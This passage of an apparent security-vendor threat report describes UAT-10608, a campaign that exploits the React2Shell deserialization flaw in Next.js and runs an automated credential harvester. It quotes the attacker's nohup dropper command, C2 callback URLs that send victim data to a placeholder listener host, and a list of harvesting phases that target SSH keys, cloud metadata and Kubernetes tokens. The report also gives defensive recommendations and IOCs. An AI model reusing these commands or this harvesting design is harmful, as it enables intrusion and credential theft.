solid rgb(0, 0, 0); width: 165px;"><div class="TableCellContent SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 8px; user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW181986150 BCX0" xml:lang="EN-US" lang="EN-US" paraid="1887384421" paraeid="{e24eefab-d52d-47ff-bc4d-71e5efd63095}{232}" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; font-kerning: none; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; font-variant-ligatures: none !important; font-size: 12pt; font-style: normal; line-height: 22.0875px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; font-weight: normal;"><span class="NormalTextRun SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text;">~87 (11.4%)</span></span><span class="EOP SCXW181986150 BCX0" data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:0,&quot;335559739&quot;:0}" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; font-size: 12pt; line-height: 22.0875px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW181986150 BCX0" role="row" aria-rowindex="8" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; overflow: visible; height: 20px;"><td class="FirstCol SCXW181986150 BCX0" role="rowheader" data-celllook="4369" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; overflow: visible; vertical-align: middle; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 271px;"><div class="TableCellContent SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 8px; user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW181986150 BCX0" xml:lang="EN-US" lang="EN-US" paraid="1101502054" paraeid="{e24eefab-d52d-47ff-bc4d-71e5efd63095}{240}" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; font-kerning: none; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; font-variant-ligatures: none !important; font-size: 12pt; font-style: normal; line-height: 22.0875px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; font-weight: normal;"><span class="NormalTextRun SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text;">Hosts with GitHub tokens</span></span><span class="EOP SCXW181986150 BCX0" data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;335551550&quot;:1,&quot;335551620&quot;:3,&quot;335559738&quot;:0,&quot;335559739&quot;:0}" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; font-size: 12pt; line-height: 22.0875px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW181986150 BCX0" data-celllook="4369" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; overflow: visible; vertical-align: middle; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 165px;"><div class="TableCellContent SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 8px; user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW181986150 BCX0" xml:lang="EN-US" lang="EN-US" paraid="376839502" paraeid="{e24eefab-d52d-47ff-bc4d-71e5efd63095}{248}" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; font-kerning: none; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; font-variant-ligatures: none !important; font-size: 12pt; font-style: normal; line-height: 22.0875px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; font-weight: normal;"><span class="NormalTextRun SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text;">~66 (8.6%)</span></span><span class="EOP SCXW181986150 BCX0" data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:0,&quot;335559739&quot;:0}" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; font-size: 12pt; line-height: 22.0875px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW181986150 BCX0" role="row" aria-rowindex="9" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; overflow: visible; height: 20px;"><td class="FirstCol LastRow SCXW181986150 BCX0" role="rowheader" data-celllook="4369" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; overflow: visible; vertical-align: middle; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 271px;"><div class="TableCellContent SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 8px; user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW181986150 BCX0" xml:lang="EN-US" lang="EN-US" paraid="24274717" paraeid="{ddcd020b-cfb8-4067-8870-95d034ce8254}{142}" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; font-kerning: none; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; font-variant-ligatures: none !important; font-size: 12pt; font-style: normal; line-height: 22.0875px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; font-weight: normal;"><span class="NormalTextRun CommentStart SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text;">Total files collected</span></span><span class="EOP SCXW181986150 BCX0" data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;335551550&quot;:1,&quot;335551620&quot;:3,&quot;335559738&quot;:0,&quot;335559739&quot;:0}" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; font-size: 12pt; line-height: 22.0875px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif;">&#xA0;</span></p></div></div></td><td class="LastCol LastRow SCXW181986150 BCX0" data-celllook="4369" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; overflow: visible; vertical-align: middle; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 165px;"><div class="TableCellContent SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 8px; user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW181986150 BCX0" xml:lang="EN-US" lang="EN-US" paraid="516228375" paraeid="{ddcd020b-cfb8-4067-8870-95d034ce8254}{144}" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; font-kerning: none; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; font-variant-ligatures: none !important; font-size: 12pt; font-style: normal; line-height: 22.0875px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; font-weight: normal;"><span class="NormalTextRun SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text;">10,120</span></span><span class="EOP SCXW181986150 BCX0" data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:0,&quot;335559739&quot;:0}" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; font-size: 12pt; line-height: 22.0875px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif;">&#xA0;</span></p></div></div></td></tr></tbody></table>
<!--kg-card-end: html-->
<h2 id="initial-access">Initial&#xA0;access&#xA0;</h2><p>UAT-10608 targets public-facing web applications using components,&#xA0;predominately Next.js, that are vulnerable to&#xA0;CVE-2025-55182, broadly referred to as &#x201C;React2Shell.&#x201D;&#xA0;</p><p>React2Shell&#xA0;is a pre-authentication remote code execution (RCE) vulnerability in React Server Components (RSC). RSCs&#xA0;expose&#xA0;Server Function endpoints that accept serialized data from&#xA0;clients.&#xA0;The affected code deserializes payloads from inbound HTTP requests to these endpoints&#xA0;without&#xA0;adequate validation or&#xA0;sanitization.&#xA0;</p><h3 id="exploitation-steps">Exploitation&#xA0;steps&#xA0;</h3><ol><li>An attacker&#xA0;identifies&#xA0;a publicly accessible application using a vulnerable version of RSCs or a framework built on top of it (e.g., Next.js).&#xA0;</li><li>The attacker crafts a malicious serialized payload designed to abuse the deserialization&#xA0;routine&#xA0;&#x2014;&#xA0;a technique commonly used to trigger arbitrary object instantiation or&#xA0;method&#xA0;invocation&#xA0;on the server.&#xA0;</li><li>The payload is sent via an HTTP request directly to a Server Function endpoint. No&#xA0;authentication&#xA0;is&#xA0;required.&#xA0;</li><li>The server deserializes the malicious payload, resulting in arbitrary code execution in the&#xA0;server-side Node.js process.&#xA0;</li></ol><p>Once the&#xA0;threat&#xA0;actor&#xA0;identifies&#xA0;a vulnerable endpoint, the automated toolkit takes over.&#xA0;No further manual interaction is&#xA0;required&#xA0;to extract and exfiltrate credentials harvested from the system.&#xA0;</p><h2 id="automated-harvesting-script">Automated&#xA0;harvesting&#xA0;script&#xA0;</h2><p>Data is collected via&#xA0;nohup-executed shell scripts dropped in&#xA0;/tmp&#xA0;with randomized names:</p>
<!--kg-card-begin: html-->
<pre>
/bin/sh -c nohup sh /tmp/.eba9ee1e4.sh &gt;/dev/null 2&gt;&amp;1
</pre>
<!--kg-card-end: html-->
<p>This is consistent with a staged payload delivery model.&#xA0;The initial React exploit delivers a small dropper that fetches and runs the full multi-phase harvesting script.&#xA0;Upon execution,&#xA0;the harvesting&#xA0;script iterates through several phases to collect various data from the compromised system, outlined below:&#xA0;</p><ul><li><strong>environ</strong>&#xA0;- Dump running process environment variables&#xA0;&#xA0;</li><li><strong>jsenv</strong>&#xA0;- Extract JSON-parsed environment from JS runtime&#xA0;&#xA0;</li><li><strong>ssh</strong>&#xA0;- Harvest SSH private keys and&#xA0;authorized_keys&#xA0;&#xA0;</li><li><strong>tokens</strong>&#xA0;- Pattern-match and extract credential strings&#xA0;&#xA0;</li><li><strong>history</strong>&#xA0;- Capture shell command history&#xA0;&#xA0;</li><li><strong>cloud_meta</strong>&#xA0;- Query cloud metadata APIs (AWS/GCP/Azure)&#xA0;&#xA0;</li><li><strong>k8s</strong>&#xA0;- Extract Kubernetes service account tokens&#xA0;&#xA0;</li><li><strong>docker</strong>&#xA0;-&#xA0;Enumerate&#xA0;container configurations&#xA0;&#xA0;</li><li><strong>cmdline</strong>&#xA0;- List all running process command lines&#xA0;&#xA0;</li><li><strong>proc_all&#xA0;</strong>- Aggregate all process environment variables&#xA0;</li></ul><p>The framework&#xA0;leverages&#xA0;a&#xA0;meta.json&#xA0;file that tracks execution state:&#xA0;</p><figure class="kg-card kg-image-card"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/data-src-image-93ec01b9-6994-4f76-a2f1-ba60f6042023.png" class="kg-image" alt="UAT-10608: Inside a large-scale automated credential harvesting operation targeting web applications" loading="lazy" width="936" height="378" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/data-src-image-93ec01b9-6994-4f76-a2f1-ba60f6042023.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/data-src-image-93ec01b9-6994-4f76-a2f1-ba60f6042023.png 936w" sizes="(min-width: 720px) 720px"></figure><p>&#xA0;Following the completion of each collection phase, an HTTP request is made back to the&#xA0;C2&#xA0;server running the NEXUS Listener&#xA0;component. In most cases, the callback takes place on port 8080 and&#xA0;contains&#xA0;the following parameters:&#xA0;</p><ul><li>Hostname&#xA0;</li><li>Phase&#xA0;</li><li>ID&#xA0;</li></ul><p>Some examples of the full URL, executed after each phase:&#xA0;</p>
<!--kg-card-begin: html-->
<pre>
http://&lt;NEXUS_LISTENER_IP&gt;:8080/h=&lt;VICTIM_HOSTNAME&gt;&amp;l=info&amp;id= 123abc45 

http://&lt;NEXUS_LISTENER_IP&gt;:8080/h=&lt;VICTIM_HOSTNAME&gt;&amp;l=jsenv&amp;id= 123abc45 

http://&lt;NEXUS_LISTENER_IP&gt;:8080/h=&lt;VICTIM_HOSTNAME&gt;&amp;l=k8s&amp;id=123abc45 

http://&lt;NEXUS_LISTENER_IP&gt;:8080/h=&lt;VICTIM_HOSTNAME&gt;&amp;l=crontab&amp;id=123abc45 
</pre>
<!--kg-card-end: html-->
<h2 id="nexus-listener">NEXUS Listener&#xA0;</h2><p>After data is exfiltrated from a compromised system and sent back to the C2 infrastructure, it is&#xA0;stored in a database and&#xA0;made available via a web application&#xA0;called NEXUS Listener.&#xA0;In most instances, the web application front end is protected with a password, the prompt for which can be seen&#xA0;in Figure 1.&#xA0;</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/data-src-image-8feaa571-399e-4a7a-9c9f-a42116a2bb2d.png" class="kg-image" alt="UAT-10608: Inside a large-scale automated credential harvesting operation targeting web applications" loading="lazy" width="996" height="432" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/data-src-image-8feaa571-399e-4a7a-9c9f-a42116a2bb2d.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/data-src-image-8feaa571-399e-4a7a-9c9f-a42116a2bb2d.png 996w" sizes="(min-width: 720px) 720px"><figcaption><i><em class="italic" style="white-space: pre-wrap;">Figure 1.</em></i> <i><em class="italic" style="white-space: pre-wrap;">NEXUS Listener Login Prompt.</em></i></figcaption></figure><p>&#xA0;In at least one instance, the web application was left exposed, revealing a wealth of information, including the inner workings of the application itself, as well as the data that was harvested from compromised systems.&#xA0;</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/data-src-image-0c263eef-fb1d-4573-8481-200cb6d2d4e0.png" class="kg-image" alt="UAT-10608: Inside a large-scale automated credential harvesting operation targeting web applications" loading="lazy" width="996" height="457" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/data-src-image-0c263eef-fb1d-4573-8481-200cb6d2d4e0.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/data-src-image-0c263eef-fb1d-4573-8481-200cb6d2d4e0.png 996w" sizes="(min-width: 720px) 720px"><figcaption><i><em class="italic" style="white-space: pre-wrap;">Figure 2.</em></i> <i><em class="italic" style="white-space: pre-wrap;">NEXUS Listener homepage with statistics.</em></i></figcaption></figure><p>The application&#xA0;contains&#xA0;a listing of several statistics, including the number of hosts compromised and the total number of each credential type that&#xA0;were&#xA0;successfully extracted from those hosts.&#xA0;It also lists the uptime of the application itself. In this case, the automated exploitation and harvesting framework was able to successfully compromise&#xA0;766 hosts within a 24-hour period.&#xA0;</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/data-src-image-db4dce44-eee2-436e-9329-a1333b7401e0.png" class="kg-image" alt="UAT-10608: Inside a large-scale automated credential harvesting operation targeting web applications" loading="lazy" width="936" height="430" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/data-src-image-db4dce44-eee2-436e-9329-a1333b7401e0.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/data-src-image-db4dce44-eee2-436e-9329-a1333b7401e0.png 936w" sizes="(min-width: 720px) 720px"><figcaption><i><em class="italic" style="white-space: pre-wrap;">Figure 3.</em></i> <i><em class="italic" style="white-space: pre-wrap;">NEXUS Listener victims list.</em></i></figcaption></figure><p>The web application allows a user to browse through&#xA0;all of&#xA0;the compromised hosts.&#xA0;A given host can then be selected, bringing up a menu with&#xA0;all of&#xA0;the exfiltrated data corresponding to each phase of the harvesting script.&#xA0;</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/data-src-image-834eb095-5f57-47b3-8f5e-9964d1a3cd9d.png" class="kg-image" alt="UAT-10608: Inside a large-scale automated credential harvesting operation targeting web applications" loading="lazy" width="936" height="430" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/data-src-image-834eb095-5f57-47b3-8f5e-9964d1a3cd9d.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/data-src-image-834eb095-5f57-47b3-8f5e-9964d1a3cd9d.png 936w" sizes="(min-width: 720px) 720px"><figcaption><i><em class="italic" style="white-space: pre-wrap;">Figure 4.</em></i> <i><em class="italic" style="white-space: pre-wrap;">NEXUS Listener individual victim credentials.</em></i></figcaption></figure><p>The observed NEXUS Listener instances display &#x201C;v3&#x201D; in the title,&#xA0;indicating&#xA0;the application has gone through various stages of development before reaching the currently deployed version.</p><h2 id="analysis">Analysis&#xA0;</h2><p>Cisco Talos was able to obtain data from an&#xA0;unauthenticated&#xA0;NEXUS Listener instance. The following is an analysis of that data, broken down by&#xA0;credential&#xA0;category.&#xA0;</p><h3 id="credential-categories">Credential Categories&#xA0;</h3><p><strong>Environment</strong>&#xA0;<strong>secrets and API</strong>&#xA0;<strong>keys</strong>&#xA0;</p><p>The&#xA0;&#x201C;environ.txt&#x201D;&#xA0;and&#xA0;&#x201C;jsenv.txt&#x201D;&#xA0;files&#xA0;contain&#xA0;the runtime environment of each compromised application process, exposing a&#xA0;variety of third-party API credentials:&#xA0;</p><ul><li>AI platform keys: OpenAI, Anthropic, NVIDIA NIM,&#xA0;OpenRouter,&#xA0;Tavily&#xA0;</li><li>Payment processors: Stripe live secret keys (sk_live_*)&#xA0;</li><li>Cloud providers: AWS access key/secret pairs, Azure subscription credentials&#xA0;</li><li>Communication platforms: SendGrid, Brevo/Sendinblue&#xA0;transactional email API keys, Telegram bot tokens and webhook secrets&#xA0;</li><li>Source control: GitHub personal access tokens, GitLab tokens&#xA0;</li><li>Database connection strings: Full&#xA0;DATABASE_URL&#xA0;values including hostnames, ports, usernames, and cleartext passwords&#xA0;</li><li>Custom application secrets: Auth tokens, dashboard passwords, webhook signing secrets &#x2014; often high-entropy hex or&#xA0;Base64 strings&#xA0;</li></ul><p><strong>SSH</strong>&#xA0;<strong>private</strong>&#xA0;<strong>keys</strong>&#xA0;</p><p>Present&#xA0;in 78% of hosts, the&#xA0;&#x201C;ssh.txt&#x201D;&#xA0;files&#xA0;contain&#xA0;complete PEM-encoded private keys (both ED25519 and RSA formats) along with&#xA0;authorized_keys&#xA0;entries. These keys enable lateral movement to any other system that trusts the compromised host&apos;s key identity &#x2014; a particularly severe finding for organizations with shared key infrastructure or bastion-host architectures.&#xA0;</p><p><strong>Cloud</strong>&#xA0;<strong>credential</strong>&#xA0;<strong>harvesting</strong>&#xA0;</p><p>The&#xA0;&#x201C;aws_full.txt&#x201D;&#xA0;and&#xA0;&#x201C;cloud_meta.txt&#x201D;&#xA0;phases attempt to query the AWS Instance Metadata Service (IMDS), GCP metadata server, and Azure IMDS. For cloud-hosted targets, successful retrieval yields IAM role-associated temporary credentials &#x2014; credentials that carry whatever permissions were granted to the instance role, which in misconfigured environments can include S3 bucket access, EC2 control plane operations, or secrets manager read access.&#xA0;</p><p><strong>Kubernetes</strong>&#xA0;<strong>service</strong>&#xA0;<strong>account</strong>&#xA0;<strong>tokens</strong>&#xA0;</p><p>The&#xA0;&#x201C;k8s.txt&#x201D;&#xA0;phase targets containerized workloads,&#xA0;attempting&#xA0;to read the default service account token mounted at&#xA0;/var/run/secrets/kubernetes.io/serviceaccount/token. A compromised Kubernetes token can allow an attacker to&#xA0;enumerate&#xA0;cluster resources, read secrets from other namespaces, or escalate to cluster-admin depending on RBAC configuration.&#xA0;</p><p><strong>Docker</strong>&#xA0;<strong>container</strong>&#xA0;<strong>intelligence</strong>&#xA0;</p><p>For hosts running Docker (approximately 6% of the dataset), the&#xA0;&#x201C;docker.txt&#x201D;&#xA0;phase&#xA0;enumerates&#xA0;all running containers, their images, exposed ports, network configurations, mount points, and environment variables. Notable services&#xA0;observed&#xA0;include phpMyAdmin instances, n8n workflow automation, and internal administrative dashboards &#x2014; all of which are high-value targets for follow-on access.&#xA0;</p><p><strong>Shell</strong>&#xA0;<strong>command</strong>&#xA0;<strong>history</strong>&#xA0;</p><p>Command history files reveal operator behavior on compromised systems and&#xA0;other information that could be useful for&#xA0;post-compromise&#xA0;activity. Observed patterns include:&#xA0;</p><ul><li>MySQL client invocations with explicit credentials:&#xA0;mysql&#xA0;-u root -p&#xA0;</li><li>Database service management:&#xA0;/etc/init.d/mysqld&#xA0;restart</li></ul><h2 id="implications">Implications&#xA0;</h2><ul><li><strong>Credential</strong>&#xA0;<strong>compromise and</strong>&#xA0;<strong>account</strong>&#xA0;<strong>takeover:</strong>&#xA0;Every credential in this dataset should be considered fully compromised. Live Stripe secret keys enable fraudulent charges and refund manipulation. AWS keys with broad IAM permissions enable cloud infrastructure takeover, data exfiltration from S3, and lateral movement within AWS&#xA0;organizations. Database connection strings with cleartext passwords provide direct access to application data stores&#xA0;containing&#xA0;user&#xA0;personally identifiable information (PII), financial records, or proprietary data.&#xA0;</li><li><strong>Lateral</strong>&#xA0;<strong>movement via SSH:</strong>&#xA0;The large corpus of exposed SSH private keys creates a persistent lateral movement risk that survives the rotation of application credentials. If any of these keys are reused across systems (a common operational practice), the attacker&#xA0;retains&#xA0;access to those systems even after the&#xA0;initial&#xA0;compromise is detected and remediated.&#xA0;</li><li><strong>Supply</strong>&#xA0;<strong>chain</strong>&#xA0;<strong>risk:</strong>&#xA0;Several hosts show evidence of package registry authentication files (&#x201C;pkgauth.txt&#x201D;), including&#xA0;npm&#xA0;and pip configuration with registry credentials. Compromised package registry tokens could enable a supply chain attack &#x2014; publishing malicious versions of packages under a legitimate maintainer&apos;s identity.&#xA0;</li><li><strong>Data</strong>&#xA0;<strong>aggregation and</strong>&#xA0;<strong>intelligence</strong>&#xA0;<strong>value:</strong>&#xA0;Beyond the immediate operational value of individual credentials, the aggregate dataset&#xA0;represents&#xA0;a detailed map of the victim organizations&apos; infrastructure: what services they run, how&#xA0;they&apos;re&#xA0;configured, what cloud providers they use, and what third-party integrations are in place. This intelligence has significant value for crafting targeted follow-on attacks, social engineering campaigns, or selling access to other threat actors.&#xA0;</li><li><strong>Reputational and</strong>&#xA0;<strong>regulatory</strong>&#xA0;<strong>exposure:</strong>&#xA0;For any&#xA0;organization&#xA0;whose data appears in this set, there are serious compliance implications. Database credentials exposing PII trigger&#xA0;breach&#xA0;notification requirements under GDPR, CCPA, and sector-specific regulations. Organizations that process payments whose Stripe keys are exposed face PCI DSS incident response obligations. The exposure of AI platform API keys can result in significant unauthorized usage charges in addition to the security risk.&#xA0;</li></ul><h2 id="recommendations">Recommendations&#xA0;</h2><ol><li><strong>Audit&#xA0;getServerSideProps&#xA0;and&#xA0;getStaticProps&#xA0;implementations:</strong>&#xA0;Ensure no secrets or server-only environment variables are passed as props to client components.&#xA0;</li><li><strong>Enforce NEXT_PUBLIC_ prefix discipline:</strong>&#xA0;Only variables that are intentionally public should carry this prefix. Audit all variables for misclassification.&#xA0;</li><li><strong>Rotate all credentials&#xA0;immediately</strong>&#xA0;if any overlap with the described victim profile is suspected.&#xA0;</li><li><strong>Implement IMDSv2 enforcement</strong>&#xA0;on all AWS EC2 instances to require session-oriented metadata queries, blocking unauthenticated metadata service abuse.&#xA0;</li><li><strong>Segment SSH keys:</strong>&#xA0;Avoid reusing SSH key pairs across different systems or environments.&#xA0;</li><li><strong>Enable cloud provider secret scanning:</strong>&#xA0;AWS, GitHub, and others offer native secret scanning that can detect and alert on committed or exposed credentials.&#xA0;</li><li><strong>Deploy runtime application self-protection (RASP)</strong>&#xA0;or a WAF rule set tuned for Next.js-specific attack patterns, particularly those targeting SSR data injection points.&#xA0;</li><li><strong>Audit container environments</strong>&#xA0;for least-privilege.&#xA0;Application containers should not have access to the host SSH&#xA0;agent,&#xA0;host filesystem mounts&#xA0;containing&#xA0;sensitive data, or overly permissive IAM instance roles.&#xA0;</li></ol><h2 id="coverage">Coverage&#xA0;</h2><p>SNORT&#xAE;&#xA0;ID for CVE-2025-55182, aka React2Shell:&#xA0;65554&#xA0;</p><h2 id="indicators-of-compromise-iocs">Indicators of compromise (IOCs)&#xA0;</h2><p>Organizations should investigate for the following artifacts on web application hosts:&#xA0;</p><ul><li>Unexpected processes spawned from /tmp/ with randomized dot-prefixed names (e.g., /tmp/.e40e7da0c.sh)&#xA0;</li><li>nohup&#xA0;invocations in process listings not associated with known application workflows&#xA0;</li><li>Unusual outbound HTTP/S connections from application containers to non-production endpoints&#xA0;</li><li>Evidence of __NEXT_DATA__&#xA0;containing&#xA0;server-side secrets in&#xA0;rendered&#xA0;HTML&#xA0;</li></ul><p>IOCs for this threat also available on our GitHub repository <a href="https://github.com/Cisco-Talos/IOCs/tree/main/2026/04" rel="noreferrer">here</a>.</p>
<!--kg-card-begin: html-->
<pre>
144[.]172[.]102[.]88&#xA0;&#xA0;
172[.]86[.]127[.]128&#xA0;&#xA0;
144[.]172[.]112[.]136&#xA0;&#xA0;
144[.]172[.]117[.]112
</pre>
<!--kg-card-end: html-->
